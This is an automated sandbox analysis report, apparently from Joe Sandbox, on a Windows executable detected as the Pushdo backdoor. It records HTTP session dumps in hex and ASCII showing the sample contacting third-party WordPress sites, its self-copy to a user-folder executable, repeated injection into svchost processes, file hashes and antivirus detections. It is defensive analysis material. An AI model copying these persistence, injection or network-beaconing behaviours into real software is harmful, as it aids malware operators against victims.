                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 806e75d80cc44325-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              2023-09-15 05:27:24 UTC58INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compa
                                                                                                                                                                              2023-09-15 05:27:24 UTC58INData Raw: 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c
                                                                                                                                                                              Data Ascii: tible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"><meta http-equiv="refresh" content="35"></head><body cl
                                                                                                                                                                              2023-09-15 05:27:24 UTC60INData Raw: 70 78 55 4c 49 45 37 44 70 77 36 72 58 74 7a 67 6c 64 35 35 2d 4a 55 6d 61 5a 58 35 71 39 48 77 45 31 2d 69 70 70 57 68 2d 66 6c 46 47 67 38 4d 68 6b 69 78 5a 4e 6d 4e 65 67 34 4d 4d 56 2d 4b 47 61 79 54 78 5f 39 41 51 73 30 47 4d 32 64 45 6d 61 48 44 7a 58 70 4a 39 30 6e 78 62 41 70 47 79 69 36 44 77 61 6c 52 4d 2d 57 33 41 72 57 64 2d 4a 36 68 56 34 6b 38 33 54 47 52 48 39 63 5a 65 75 77 59 6e 35 42 68 79 47 66 63 62 5f 57 6e 79 34 5f 7a 45 5f 6b 57 70 74 48 39 4d 6e 50 6b 2d 4c 2d 6e 58 76 6e 64 6d 31 55 34 6d 2d 4a 54 2d 53 42 4b 6b 76 64 6f 68 42 73 6e 4a 6f 49 39 38 44 7a 5f 42 53 61 6b 63 69 67 54 6e 52 6d 67 34 5f 52 76 35 72 30 67 5a 31 70 50 61 47 4f 45 4c 76 4c 6a 4a 41 4a 63 59 59 56 71 79 46 63 34 62 47 59 57 42 72 31 32 74 31 51 75 34 74 41
                                                                                                                                                                              Data Ascii: pxULIE7Dpw6rXtzgld55-JUmaZX5q9HwE1-ippWh-flFGg8MhkixZNmNeg4MMV-KGayTx_9AQs0GM2dEmaHDzXpJ90nxbApGyi6DwalRM-W3ArWd-J6hV4k83TGRH9cZeuwYn5BhyGfcb_Wny4_zE_kWptH9MnPk-L-nXvndm1U4m-JT-SBKkvdohBsnJoI98Dz_BSakcigTnRmg4_Rv5r0gZ1pPaGOELvLjJAJcYYVqyFc4bGYWBr12t1Qu4tA
                                                                                                                                                                              2023-09-15 05:27:24 UTC61INData Raw: 36 67 48 59 6e 52 45 51 4f 2d 41 5f 56 70 57 51 73 35 58 71 45 61 7a 47 6f 59 65 34 30 57 69 77 64 34 4a 57 42 6c 34 48 71 63 68 31 6c 38 4f 39 55 59 6c 51 42 6b 58 52 49 64 61 50 32 39 4a 69 34 37 35 31 51 36 33 5f 72 36 57 69 45 53 45 2d 43 51 7a 74 2d 76 4b 43 43 32 54 32 41 30 57 46 7a 79 59 4f 6e 5a 75 68 39 4a 52 79 68 43 76 4c 36 58 62 5f 6d 55 65 59 33 36 4e 51 65 76 35 6f 30 59 76 4c 70 66 51 4c 59 7a 39 49 42 63 41 4b 46 53 50 77 75 6e 73 35 4e 61 33 39 2d 79 79 51 36 70 5f 46 63 4f 48 6f 6e 42 75 46 6a 37 64 56 6a 55 49 77 4c 55 6c 62 54 6b 5f 34 6d 45 6c 49 77 47 6b 33 46 66 4e 59 68 65 6c 37 6f 34 35 41 74 49 5a 71 73 33 52 73 6b 6a 71 4e 61 6e 73 70 6c 70 6e 68 64 54 75 4e 2d 6a 43 37 78 76 43 7a 4d 31 63 7a 79 6e 34 48 76 63 4a 4c 67 56 77
                                                                                                                                                                              Data Ascii: 6gHYnREQO-A_VpWQs5XqEazGoYe40Wiwd4JWBl4Hqch1l8O9UYlQBkXRIdaP29Ji4751Q63_r6WiESE-CQzt-vKCC2T2A0WFzyYOnZuh9JRyhCvL6Xb_mUeY36NQev5o0YvLpfQLYz9IBcAKFSPwuns5Na39-yyQ6p_FcOHonBuFj7dVjUIwLUlbTk_4mElIwGk3FfNYhel7o45AtIZqs3RskjqNansplpnhdTuN-jC7xvCzM1czyn4HvcJLgVw
                                                                                                                                                                              2023-09-15 05:27:24 UTC62INData Raw: 73 6f 42 49 4f 69 58 2b 38 6c 70 79 57 49 79 43 78 76 6b 63 63 53 53 57 54 51 55 31 52 50 2f 52 6e 31 67 30 2f 65 4d 56 75 5a 67 4a 32 34 37 45 38 44 5a 47 6f 73 52 30 57 30 53 46 56 48 44 61 39 7a 2b 54 34 6f 50 35 78 47 41 71 35 2f 78 53 74 45 59 7a 44 75 57 39 52 4b 68 55 4b 68 68 6a 6e 67 51 4f 69 57 6b 73 62 75 6a 6d 42 65 58 76 37 49 48 65 33 74 75 56 63 57 64 2f 78 32 59 75 6e 76 6e 68 44 68 31 2b 68 71 6c 4b 73 43 61 63 64 34 4e 32 67 6b 35 54 78 38 42 74 4c 32 33 51 5a 72 6e 4b 2f 4f 43 44 31 4b 45 5a 42 43 32 61 4b 68 63 75 2f 44 70 4d 36 4b 42 6d 59 63 70 34 78 48 71 63 42 4c 7a 35 39 4a 38 4e 42 45 50 35 56 62 6e 6b 4e 66 4d 6f 47 6c 53 46 35 58 56 45 3d 27 2c 74 3a 20 27 4d 54 59 35 4e 44 63 31 4e 54 59 30 4e 43 34 78 4e 6a 51 77 4d 44 41 3d
                                                                                                                                                                              Data Ascii: soBIOiX+8lpyWIyCxvkccSSWTQU1RP/Rn1g0/eMVuZgJ247E8DZGosR0W0SFVHDa9z+T4oP5xGAq5/xStEYzDuW9RKhUKhhjngQOiWksbujmBeXv7IHe3tuVcWd/x2YunvnhDh1+hqlKsCacd4N2gk5Tx8BtL23QZrnK/OCD1KEZBC2aKhcu/DpM6KBmYcp4xHqcBLz59J8NBEP5VbnkNfMoGlSF5XVE=',t: 'MTY5NDc1NTY0NC4xNjQwMDA=
                                                                                                                                                                              2023-09-15 05:27:24 UTC64INData Raw: 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: ame('head')[0].appendChild(cpo);}());</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              9192.168.2.35024883.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:24 UTC64OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: dataform.co.uk
                                                                                                                                                                              2023-09-15 05:27:25 UTC232INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                              Keep-Alive: timeout=2, max=100
                                                                                                                                                                              Content-Length: 49179
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              X-Powered-By: PHP/7.0.29
                                                                                                                                                                              X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                              Strict-Transport-Security: max-age=10886400
                                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:24 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2023-09-15 05:27:25 UTC233INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                              Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                              2023-09-15 05:27:25 UTC235INData Raw: 28 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 29 2c 74 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 72 3d 30 3b 72 3c 6f 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 70 7c 7c 21 70 2e 66 69 6c 6c 54 65 78 74 29 72 65 74 75 72 6e 21 31 3b 73 77 69 74 63 68 28 70 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 70 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 65 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 73 28 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 2c 5b 35 35 33 35 36 2c 35 36 38
                                                                                                                                                                              Data Ascii: ("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([55356,56826,55356,56819],[55356,568
                                                                                                                                                                              2023-09-15 05:27:25 UTC283INData Raw: 3d 27 30 20 31 36 20 31 36 27 20 74 6f 3d 27 33 36 30 20 31 36 20 31 36 27 20 64 75 72 3d 27 30 2e 38 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 25 33 43 2f 73 76 67 25 33 45 22 29 3b 0a 7d 0a 2e 68 6f 75 72 67 6c 61 73 73 2d 6c 6f 61 64 65 72 20 2e 6c 6f 61 64 2d 77 72 61 70 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 33 32 20 33 32 27 20 77 69 64 74 68 3d 27 37 32 27 20 68 65 69 67 68 74 3d 27 37 32
                                                                                                                                                                              Data Ascii: ='0 16 16' to='360 16 16' dur='0.8s' repeatCount='indefinite' /%3E %3C/path%3E %3C/svg%3E");}.hourglass-loader .load-wrap { background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32' width='72' height='72
                                                                                                                                                                              2023-09-15 05:27:25 UTC291INData Raw: 67 69 66 22 2c 22 61 6a 61 78 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 68 6f 6e 65 79 70 6f 74 5f 66 61 69 6c 22 3a 22 48 6f 6e 65 79 70 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e 20 65 72 72 6f 72 22 2c 22 69 73 5f 73 75 62 6d 69 73 73 69 6f 6e 22 3a 22 22 2c 22 6d 61 78 5f 66 69 6c 65 73 22 3a 22 30 22 2c 22 6d 61 78 5f 66 69 6c 65 73 5f 65 78 63 65 65 64 65 64 22 3a 22 54 68 65 20 6d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 66 69 6c 65 73 20 79 6f 75 20 61 72 65 20 61 6c 6c 6f 77 65 64 20 74 6f 20 75 70 6c 6f 61 64 20 69 73 20 30 2e 22 2c 22 6e 65 65 64 73 5f 62 73 34 22 3a 22 22 2c 22 6f 6e 65 5f 6f 70 74 69 6f
                                                                                                                                                                              Data Ascii: gif","ajaxurl":"https:\/\/dataform.co.uk\/wp-admin\/admin-ajax.php","honeypot_fail":"Honeypot validation error","is_submission":"","max_files":"0","max_files_exceeded":"The maximum number of files you are allowed to upload is 0.","needs_bs4":"","one_optio
                                                                                                                                                                              2023-09-15 05:27:25 UTC299INData Raw: 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 6c 61 62 65 6c 2e 63 68 65 63 6b 62 6f 78 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 2e 6d 75 5f 61 6c 65 72 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 33 33 33 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 66 65 30 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 36 64 62 35 35 7d 3c 2f 73 74 79 6c 65 3e 0a 09
                                                                                                                                                                              Data Ascii: x;display:inline}.mu_register label{font-weight:700;font-size:15px;display:block;margin:10px 0}.mu_register label.checkbox{display:inline}.mu_register .mu_alert{font-weight:700;padding:10px;color:#333;background:#ffffe0;border:1px solid #e6db55}</style>
                                                                                                                                                                              2023-09-15 05:27:25 UTC307INData Raw: 65 20 76 63 5f 67 65 6e 65 72 61 6c 20 76 63 5f 62 74 6e 33 20 76 63 5f 62 74 6e 33 2d 73 69 7a 65 2d 6d 64 20 76 63 5f 62 74 6e 33 2d 73 68 61 70 65 2d 72 6f 75 6e 64 65 64 20 76 63 5f 62 74 6e 33 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 76 63 5f 62 74 6e 33 2d 63 6f 6c 6f 72 2d 77 68 69 74 65 22 20 68 72 65 66 3d 22 2f 72 65 71 75 65 73 74 2d 64 65 6d 6f 2f 22 20 74 69 74 6c 65 3d 22 22 3e 52 45 51 55 45 53 54 20 44 45 4d 4f 3c 2f 61 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 68 65 61 64 65 72 3e 0a 0a 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 27 64 74 2d 63 6c 6f 73 65 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 69 63 6f 6e 27 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                                                                                                                              Data Ascii: e vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-rounded vc_btn3-style-outline vc_btn3-color-white" href="/request-demo/" title="">REQUEST DEMO</a></p></div></div></header></div><div class='dt-close-mobile-menu-icon'><span></span></div><div class=
                                                                                                                                                                              2023-09-15 05:27:25 UTC347INData Raw: 30 29 3b 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 74 72 75 65 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 63 6c 6f 63 6b 28 29 7b 73 74 6f 70 63 6c 6f 63 6b 28 29 3b 73 68 6f 77 74 69 6d 65 28 29 3b 7d 0a 76 61 72 20 74 69 6d 65 72 49 44 3d 6e 75 6c 6c 3b 76 61 72 20 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66 61 6c 73 65 3b 76 61 72 20 78 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 6e 6f 77 3d 78 2e 67 65 74 54 69 6d 65 28 29 3b 76 61 72 20 67 6d 74 3d 31 36 39 34 37 35 35 36 34 35 2a 31 30 30 30 3b 76 61 72 20 64 69 66 66 6d 73 3d 28 6e 6f 77 2d 67 6d 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 73 6c 69 64 65 69 6e 22 3e 64
                                                                                                                                                                              Data Ascii: 0);timerRunning=true;}function startclock(){stopclock();showtime();}var timerID=null;var timerRunning=false;var x=new Date();var now=x.getTime();var gmt=1694755645*1000;var diffms=(now-gmt);</script><script type="text/javascript" id="slidein">d


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:07:25:57
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Users\user\Desktop\OWd39WUX3D.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Users\user\Desktop\OWd39WUX3D.exe
                                                                                                                                                                              Imagebase:0xdf0000
                                                                                                                                                                              File size:266'240 bytes
                                                                                                                                                                              MD5 hash:DC6330AFF08812B5DBAF66CF0671CB20
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:07:26:12
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                              Imagebase:0x1200000
                                                                                                                                                                              File size:266'240 bytes
                                                                                                                                                                              MD5 hash:DC6330AFF08812B5DBAF66CF0671CB20
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 30%, ReversingLabs
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:07:26:18
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:07:26:30
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:07:27:04
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:07:27:20
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:07:27:20
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:07:27:20
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:07:27:20
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:07:27:21
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:20
                                                                                                                                                                              Start time:07:27:37
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:21
                                                                                                                                                                              Start time:07:27:37
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:22
                                                                                                                                                                              Start time:07:27:38
                                                                                                                                                                              Start date:15/09/2023
